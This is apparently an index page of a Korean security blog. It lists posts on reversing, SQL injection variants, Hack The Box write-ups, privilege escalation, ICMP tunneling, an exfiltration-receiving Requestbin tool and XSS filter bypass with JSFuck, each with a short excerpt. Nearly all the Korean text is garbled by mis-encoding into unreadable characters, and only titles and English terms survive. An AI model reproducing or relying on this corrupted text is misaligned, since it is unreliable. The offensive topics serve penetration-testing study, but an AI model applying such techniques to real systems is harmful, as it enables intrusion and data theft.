๋ฆฌ๋ฒ์ค ์์ง๋์ด๋ง ๊ธฐ๋๋ผ ์ค์ ๊ฐ์ด๋ Chapter1 ๋ฆฌ๋ฒ์ค ์์ง๋์ด๋ง ์ ๋ฌธ์ ์ ๋ฆฌํด๋ด ์๋ค. ๋์ค์ด์ ๋ธ๊ณผ ๋์ปดํ์ผ ๋์ค์ด์ ๋ธ : ํฅ์ค์ฝ๋ ์ํ์์ ์ด์ ๋ธ๋ฆฌ ์ธ์ด(์ ์์ค ์ธ์ด) ๋ก ๋ณํ ํ๋ ๊ฒ ๋์ปดํ์ผ : ํฅ์ค์ฝ๋ ์ํ์์ ๊ณ ์์ค ์ธ์ด๋ก ๋ณํ ํ๋ ๊ฒ ํ๋ก๊ทธ๋จ ์คํํ์ผ๊ณผ ํ๋์จ์ด CPU : ์ ์ด๋ถ, ์ฐ์ฐ๋ถ, ๋ ์ง์คํฐ๋ก ๊ตฌ์ฑ๋จ ์ ์ด...
Requestbin Development
์ ๋ฌด๋ฅผ ์งํํ๋ฉด์ Data ํ์ทจ๊ฐ ๊ฐ๋ฅํ ๊ฒฝ์ฐ ๊ณต๊ฒฉ์์ ์๋ฒ๋ก ๊ฐ์ ธ์ฌ ์ ์์ต๋๋ค. ์์ง ๋ถ์กฑํ๊ณ ๋ค๋ฅธ ์ข์ ๋๊ตฌ๋ค๋ ๋ง์ง๋ง ํ๋์ฉ ํด๋ณด๋๊ฒ ์ข์ง์๋๋ผ๋ ์๊ฐ์ ๊ฐ๋ฐ์ ํด๋ณด์์ต๋๋ค. requestbin? requestbin ์ด๋ client๊ฐ ์์ฒญํ๋ ์ ๋ณด๋ฅผ ๋ฐ์์ ํ์ธํ ์ ์๋ ์๋น์ค์ ๋๋ค. ์ฌ๋ฌ๊ฐ์ง ๊ตฌํ๋์ด ์๋ ๊ธฐ์ ๋ค์ด ๋ง์ง๋ง ์ ๋...
SQL Injection Sleep() is Danger..
Sleep() ํจ์๋ฅผ ์ด์ฉํ์ฌ SQLi ๊ณต๊ฒฉ์ ์ํํ ๋ ์กฐ์ฌํด์ผ ํ๋ ๋ถ๋ถ์ ์์๋ด ์๋ค. Time Based SQL Injection SLEEP ๋ชจ์ํดํน ์ ๋ฌด๋ฅผ ์ํํ ๋ Time Based SQL Injection์ด ๊ฐ๋ฅํ ๊ฒฝ์ฐ sleep() ํจ์๋ฅผ ์ด์ฉํ์ฌ ์๋ต ๊ฐ์ ์ฐจ์ด๋ฅผ ์ด์ฉํ์ฌ DB๋ฅผ ๋ฝ์์ฌ ์ ์์ต๋๋ค. ํ์ง๋ง order b...
Hack The Box - Waiting
Hack The Box mobile ๋ฌธ์ ์ธ Waiting ๋ฌธ์ ๋ฅผ ํ์ด๋ด ์๋ค. ์์ฆ ๋ชจ๋ฐ์ผ์ ๋ํต ์ํด์ ๋ค๊น๋จน์ด์โฆ ํฐ์ผ ๊ฐ์ ์ ์ผ ๋จผ์ Waiting ์ฑ ์คํ ์ ์๋์ ๊ฐ์ต๋๋ค. ๊ทธ๋ฆฌ๊ณ ๋ฐ๋ก ์ฑ์ด ์ข ๋ฃ๋ฉ๋๋ค. ์ด ์ฑ์ ๋ชจ๋ ์ข ๋ฅ์ ์ฌ์ฉ์๋ฅผ ์ํ ํ ํฐ ๋๋ ๋น๋ฐ์ ์์ฑํ๋ ๋ฐ ์ ์ฉํฉ๋๋ค. ์ ๋ฐ์ดํธ: ๋ค๋ฅธ ์ฑ์ ์์ฒญ ํ ํฐ์ ๋ํ ์ผ...
regex
์ํ๋ ํจํด์ ์ฐพ์ ๋ regex(์ ๊ทํํ์)์ ์ฌ์ฉํฉ๋๋ค. python์์ re ๋ชจ๋์์ ์ ๊ท์์ ์ฌ์ฉํ๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. ๋ฉํ ๋ฌธ์ ์ ๊ทํํ์์์ ์ฌ์ฉ๋๋ ๋ฉํ ๋ฌธ์๋ค์ ์๋ฏธ๋ฅผ ์์๋ด ์๋ค. re ๋ชจ๋ reํ์ด์ฌ์์ re๋ชจ๋๋ก ์ ๊ท์์ ์ฌ์ฉํ๋ ๋ฐฉ๋ฒ์ ์๋ ค์ค๋๋ค. ์ ๊ทํํ์ ์ปดํ์ผ ํ์ด์ฌ์์ ์ ๊ทํํ์์ ์ฌ์ฉํ๊ธฐ ์ํด ...
Hack The Box - LoveTok
Hack The Box LoveTok ๋ฌธ์ ๋ฅผ ํ์ด๋ด ์๋ค. Main Page ๋ฉ์ธ ํ์ด์ง๋ ์๋์ ๊ฐ์ต๋๋ค. format์ ๋ณ์๋ฅผ ์ ๋ ฅ๋ฐ์ ๋ ์ง ๋น์ทํ๊ฒ ์ถ๋ ฅํด์ฃผ๋ ๊ธฐ๋ฅ์ด ์กด์ฌํฉ๋๋ค. Vuln Point WEB ROOT ์ต์์ index.php๋ฅผ ๋ณด๋ฉด ๋ค์๊ณผ ๊ฐ์ต๋๋ค. <?php $router = new Router();...
Hack The Box - Templated
Hack The Box Templated ๋ฌธ์ ๋ฅผ ํ์ด๋ด ์๋ค. Description Can you exploit this simple mistake? Solve ๋ฌธ์ ์น ์ฌ์ดํธ์ ์ ๊ทผํ๋ฉด ๋ค์๊ณผ ๊ฐ๋ค. Flask๋ก ๋ง๋ค์ด์ง ์น ํ์ด์ง๋ฅผ ํ์ธํ ์ ์๋ค. URL์ test ์ ๋ ฅ์ test๋ผ๋ ๋ฌธ๊ตฌ๊ฐ ์ถ๋ ฅ๋๋ค. SSTI ...
BabyEncryption
Hack The Box BabyEncryption ๋ฌธ์ ๋ฅผ ํ์ด ๋ด ์๋ค. CHALLENGE DESCRIPTION You are after an organised crime group which is responsible for the illegal weapon market in your country. As a secret agent, yo...
loose comparison
์ต๊ทผ์ โ==โ ์ผ๋ก ๋์จํ ๋น๊ต๋ฅผ ํ๋ ์๊ฒ์ ๋ฌธ์ ๋ฅผ ํ์์ต๋๋ค. ์ด์ ๋์จํ ๋น๊ต๊ฐ ๋ฌด์์ธ์ง ์์ธํ๊ฒ ์์๋ด ์๋ค. loose comparison(๋์จํ ๋น๊ต) ๋์จํ ๋น๊ต๋ ๋ง ๊ทธ๋๋ก ๋์จํ ๋น๊ต์ ๋๋ค. ์ฝ๋์์ == ํน์ === ์ผ๋ก ๋น๊ตํ๋ ๊ฒ์ ๋ณผ ์ ์์ต๋๋ค. ==์ ๋์จํ ๋น๊ต, ===์ ์๊ฒฉํ ๋น๊ต๋ผ๊ณ ํฉ๋๋ค. ์ ์๊ฒฉํ๊ณ ...
Spoofing MAC
์ค๋ MAC Address๋ฅผ ๊ฐ๋จํ๊ฒ ๋ณ๊ฒฝ ํด์ค์ ์๋ ๋๊ตฌ๋ฅผ ์๊ฒ๋์๋ค. ํญ์ ์ ์๋ ค์ฃผ์๋ ๋ถ๋ค์๊ฒ ๊ฐ์ฌํฉ๋๋ค๐๐๐๐๐ Spoofing MAC WIKI์ ๋ฐ๋ฅด๋ฉด MAC Address๋ฅผ ๋ณ๊ฒฝํ๋ ๊ธฐ์ ์ด๋ผ๊ณ ํฉ๋๋ค. ์ผ๋ฐ์ ์ผ๋ก NIC(Network Interface Controller)์์ ํ๋์ฝ๋ฉ ๋ MAC ์ฃผ์๋ ๋ณ๊ฒฝ์ด ๋ถ๊ฐ๋ฅํฉ๋๋ค...
CVE-2022-25765 Vulnerability
Hack the Box Precious ๋ฌธ์ ๋ฅผ ํ๋ฉด์ ๋ฐ๊ฒฌ๋ ์ทจ์ฝ์ CVE-2022-25765 ๋ถ์์ ํด๋ด ์๋ค! ruby ์ธ์ด๋ฅผ ์๋ชฐ๋ผ ์ ํํ์ง ์์์ ์์ CVE-2022-25765 CVE mitre์ ๋ฐ๋ฅด๋ฉด ํด๋น ์ทจ์ฝ์ ์ ์๋์ ๊ฐ์ต๋๋ค. The package pdfkit from 0.0.0 are vulnerable to ...
Privilige escalation with Path Injection
์ผ๋ฐ์ ์ผ๋ก ์์ ๋ฐ๊ฒ ๋๋ฉด ROOT ๊ถํ์ด ์๋๋ค. ๊ทธ๋์ ์ด๋ฐ์ ๋ฐ ์ ์ฝ์ด ๋ง๊ธฐ ๋๋ฌธ์ ROOT ๊ถํ์ด๋ ์์ ๊ถํ์ด ํ์ํ ๊ฒฝ์ฐ๊ฐ ์๋ค. ๊ถํ์์น ์ทจ์ฝ์ ์ค ํ๋์ธ Path Injection์ ์์๋ณด์ Privilige escalation? ๊ถํ ์์น(Privilige escalation)์ ์ด์ ์ฒด์ ๋ ์ํํธ์จ์ด ์ ํ๋ฆฌ์ผ์ด์ ์ ๋ฒ๊ทธ, ...
Hack The Box - Precious
Hack the Box Precious ๋ฌธ์ ๋ฅผ ํ์ด ๋ด ์๋ค. Port Scanning nmap ์ค์บ๋ ๊ฒฐ๊ณผ๋ฅผ ์๋์ ๊ฐ์ต๋๋ค. ssh ์๋น์ค์ http ์๋น์ค๊ฐ ์ด๋ ค์์ต๋๋ค. ssh์ ๊ณ์ ์ ๋ณด๋ ๋ชจ๋ฅด๊ธฐ ๋๋ฌธ์ http ์๋น์ค์ ์ ์ํด ๋ณผ ์ ์์ต๋๋ค. hosts ํ์ผ์ precious.htb๋ฅผ ๋ฑ๋กํ๋ฉด ์น ํ์ด์ง์ ์ ๊ทผํ ์ ์์ต๋...
Reversing Dreamhack Helloworld
๋๋ฆผํต ๊ฐ์๋ฅผ ํตํด Helloworld.exe๋ฅผ ๋ถ์์ ํด๋ด ์๋ค. Helloworld Code ๊ฐ๋จํ ์์ ์ธ HelloWorld.exe๋ฅผ ๋ถ์ํด๋ณด์ ์์ค ์ฝ๋๋ 1์ด๋ฅผ ๋๊ธฐํ๊ณ Hello, world!๋ฅผ ์ถ๋ ฅํ๋ ํ๋ก๊ทธ๋จ์ ๋๋ค. #include <Windows.h> #include <stdio.h> char* st...
Hack The Box - Photobomb vulnerability analysis
Photobomb ๋ฌธ์ ๋ฅผ ํ๋ฉด์ ๋์๋ ์ทจ์ฝ์ ์ ๋ถ์์ ํด๋ด ์๋ค. Flag๋ฅผ ์ฐพ๋ ๊ฒ๋ ์ค์ํ์ง๋ง ์ ์ทจ์ฝ์ ์ด ํฐ์ง๋์ง ์์ธ์ ์๋ ๊ฒ์ด ๊ต์ฅํ ์ค์ํ๋ค๊ณ ์๊ฐํฉ๋๋ค.โ๏ธโ๏ธโ๏ธ. Basic Authentication ์ฒซ๋ฒ์งธ๋ก ๋ฐ๊ฒฌ๋ ์ทจ์ฝ์ ์ Baisc Authentication ์ ๋ณด๊ฐ ๋ ธ์ถ๋์๋ ์ทจ์ฝ์ ์ ๋๋ค. What is Basic...
Hack The Box - Photobomb
Hack the Box์ Photobomb์ ํ์ด๋ด ์๋ค. Port Scanning ์ ์ผ ๋จผ์ nmap์ ์ด์ฉํ์ฌ ํฌํธ์ค์บ์ ๋๋ ธ์ ๋ ๋์ค๋ ๊ฒฐ๊ณผ๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค. ์๋์ ํฌํธ๊ฐ ์ด๋ ค์์ผ๋ฉฐ ssh ์ฐ๊ฒฐ์ ID์ ํจ์ค์๋๋ฅผ ๋ชจ๋ฅด๋ http ๋ถํฐ ์ ๊ทผ์ ์๋ํ๋ค. ssh http HTTP Service ๊ทธ๋ฅ ์ ๊ทผํ๋ฉด ...
Hack The Box - Fawn
Hack the box ๊ธฐ์ด์ค Fawn์ ํ์ด๋ด ์๋ค Fawn Quiz ํ์์ ๋ฌธ์ ๋ฅผ ๋ณด๋ฉด FTP ๊ด๋ จ ๋ฌธ์ ๋ค์ด๋ค. Nmap์ ํตํด FTP ์๋น์ค๊ฐ ์ด๋ ค์๋ ๊ฒ์ ํ์ ํ๊ณ FTP ๋ฒ์ ์ด๋ผ๋์ง ์ต๋ช (Anonymous)FTP๋ก ์ ๊ทผํ์ฌ Flag๋ฅผ ์ฐพ๋๋ก ๋์ด ์๋ค. Anonymous๋ก FTP๋ฅผ ์ ๊ทผํ์ฌ flag.txt๋ฅผ ๋ค์ด๋ก๋ ๋ฐ์ ์ ์๋ค...
How to Extract Dynamic DEX Loading
์ต๊ทผ ๋ชจ๋ฐ์ผ ์ง๋จ ์ค ๋ฃจํ ํ์ง๋ฅผ ํ๊ณ ์์ง๋ง ์ด๋์ ํธ์ถํ๋์ง๋ฅผ ์ฐพ์ ์๊ฐ ์์๋๋ฐ ์ด์ฐ์ ์ฐ ํ๋ค๊ฐ Dynamic Dex Loading์ด ์ ์ฉ๋ ๊ฒ์ ๋ฐ๊ฒฌ ํ์์ต๋๋ค. Dynamic Dex Loading์ ํ๋ App์์ DEX๋ฅผ ์ถ์ถํ๋ ๋ฐฉ๋ฒ๋ค์ ๋ํด์ ์์๋ด ์๋ค. Dynamic Dex Loading ๐ตโช๏ธ๐ด Dynamic Dex Loa...
Frida TCP Hooking
TCP ํต์ ์ MITM Relay๊ฐ ์๋ Frida ํํน์ ํตํด ํจํท์ ์ก์๋ด ์๋ค. ๊ฐ์ ์์ผ ํต์ ์์ C/C++ ํจ์๋ฅผ ์ด์ฉํ๋ ๋ฐฉ๋ฒ์ ๋ฐ์ดํฐ ์ก์์ ํจ์๋ฅผ ์ด์ฉํ๋ ๋ฐฉ๋ฒ์ ๋๋ค. send(), recv() sendto(), rectfrom() ํจ์ ์ํ ํจ์ ์ํ์ ์๋์ ๊ฐ์ต๋๋ค. send(int sockfd, co...
Error Based & Error based Blind SQL Injection
DreamHack ๊ฐ์๋ฅผ ํตํด Error Based SQL Injection๊ณผ Error Based Blind SQL Injection์ ๋ํด์ ์์๋ด ์๋ค. Error Based SQL Injection Dreamhack ๊ฐ์๋ฅผ ํตํด Error Based SQL Injection์ด ๋ฌด์์ธ์ง ์์๋ด ์๋ค. Error Based SQL I...
ICMP Tunneling by Python with Scapy
ICMP Tunneling์ ํตํด ๋ด๋ถ๋ง ๊ฐ ๋ฐ์ดํฐ๋ฅผ ์ ์กํ ์ ์์ต๋๋ค. ๋ด๋ถ๋ง ๊ฐ ping ๋ช ๋ น์ด๊ฐ ๋์์ ํ๊ฒ ๋ ๊ฒฝ์ฐ ICMP Tunneling์ ์ด์ฉํ์ฌ DATA๋ฅผ ์ ๋ฌํ ์ ์์ต๋๋ค. What is ICMP? ICMP์ ๋ํ์ฌ ๊ฐ๋จํ๊ฒ ์์๋ณด๋ฉด ์ธํฐ๋ท ์ ์ด ๋ฉ์์ง ํ๋กํ ์ฝ์ผ๋ก ์ผ๋ฐ์ ์ผ๋ก IP ๋์์์ ์ง๋จ์ด๋ ์ ์ด๋ก ์ฌ์ฉ๋...
Blind SQLi With Binary Search & Python
์ด๋ฒ์๋ Binary Search๋ฅผ ์ด์ฉํ์ฌ DB๋ฅผ ์ถ์ถํ ์์๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. Binary Search Binary Search๋ ์ด์งํ์ ์๊ณ ๋ฆฌ์ฆ์ด๋ผ ํ๋ฉฐ ์ ๋ ฌ๋ ๋ฐ์ดํฐ์์ ๊ฒ์ ๋ฒ์๋ฅผ ์ค์ฌ ๋๊ฐ๋ฉด์ ์ํ๋ ๋ฐ์ดํฐ๋ฅผ ๊ฒ์ํ๋ ์๊ณ ๋ฆฌ์ฆ ์ ๋๋ค. Contain DB Name test๋ acunetix์ ์ทจ์ฝํ ํ์ด์ง๋ก ์งํ...
Blind SQLi With Bit operation & Burp Intruder
Bit operation์ ์ด์ฉํ์ฌ ๋ฒํ์ค์ํธ์ Intruder ๊ธฐ๋ฅ์ผ๋ก ๊ฐ๋จํ๊ฒ DB๋ฅผ ์ถ์ถํ ์์๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. Bit operation ํญ์ Binary Search๋ฅผ ์ด์ฉํ์ฌ Blind SQLi ์คํฌ๋ฆฝํธ๋ฅผ ๋ฅผ ๋ง๋ค์๋๋ฐ ๋๋ฆผํต ๊ฐ์๋ฅผ ํตํด MySQL DB์์ Bit operation์ ์ด์ฉํด๋ ๋๋ ๊ฒ์ ์๊ฒ๋์์ต๋๋ค ...
XSS Filtering bypass with JSFuck
XSS๋ฅผ ๋ฐ๊ฒฌํ์ง๋ง alert, confirm, prompt๋ฑ ๋ฌธ์์ด์ด WAF์์ ํํฐ๋ง ๋์์ ๋ JSFuck์ ์ด์ฉํ์ฌ ์ด๋ฅผ ์ฐํํ๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. What is JSFuck? ์ํค์ ๋ฐ๋ฅด๋ฉด JavaScript ๋ฌธ๋ฒ์์ ์ฌ์ฉ๋๋ ๋ฌธ์ ์ค ๋จ 6๊ฐ์ง์ธ [,],(,),!,+ ๋ง์ผ๋ก ๊ตฌํํ ์ ์์์ ์ฐฉ์ํ์ฌ ๊ณ ์๋ ๋ํดํ ํ๋ก๊ทธ๋...